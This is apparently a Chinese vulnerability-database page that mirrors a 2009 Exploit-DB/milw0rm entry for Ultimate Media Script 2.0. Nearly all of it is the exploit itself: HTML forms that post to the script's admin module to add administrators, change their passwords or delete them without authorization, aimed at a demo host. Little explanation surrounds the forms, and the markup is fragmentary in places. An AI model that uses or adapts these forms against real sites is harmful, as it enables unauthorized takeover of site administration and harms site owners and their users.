Ultimate Media Script 2.0 - Remote Change Content

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057841 漏洞类型
发布时间 2009-05-26 更新时间 2009-05-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/8795
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
<tittle> Ultimate Media Script 2.0 Remote Change Password/Add Admin/Delete Admin Exploit</tittle>
 <FORM action="http://umscript.com/demo/admin/index.php?mod=admins" method=post>
       <TD class=column1><INPUT class=ums_input name=username></TD>
       <TD class=column1><INPUT class=ums_input name=pass></TD>
       <TD class=column1 align=middle><INPUT type=image border=0 src="img/save.gif"></TD>
       <INPUT type=hidden value=add name=button>
      </FORM>
    </TR>
 
        <TR>
          <TD class=cat><b>Admin name:</b></TD>
          <TD class=cat><b>Password:</b></TD>
          <TD class=cat><b>Delete:</b></TD></TR>
 
        <FORM action="http://umscript.com/demo/admin/index.php?mod=admins" method=post>
 
        <TR>
          <TD class=column2 width="33%"><INPUT class=ums_input value="admin" name=username_edit[1]></TD>
          <TD class=column2 width="33%"><INPUT class=ums_input type=password value="admin" name=pass_edit[1]></TD>
          <TD class=column2><A href="http://umscript.com/demo/admin/index.php?mod=admins&delete=1" onclick="return (quest())"><IMG border=0 alt=Delete src="img/delete.gif"></A></TD>
        </TR>
 
        <INPUT type=hidden value=modify name=do>
        <TR>
           </SPAN>
           <INPUT type=image border=0 src="img/save_all.gif">

# milw0rm.com [2009-05-26]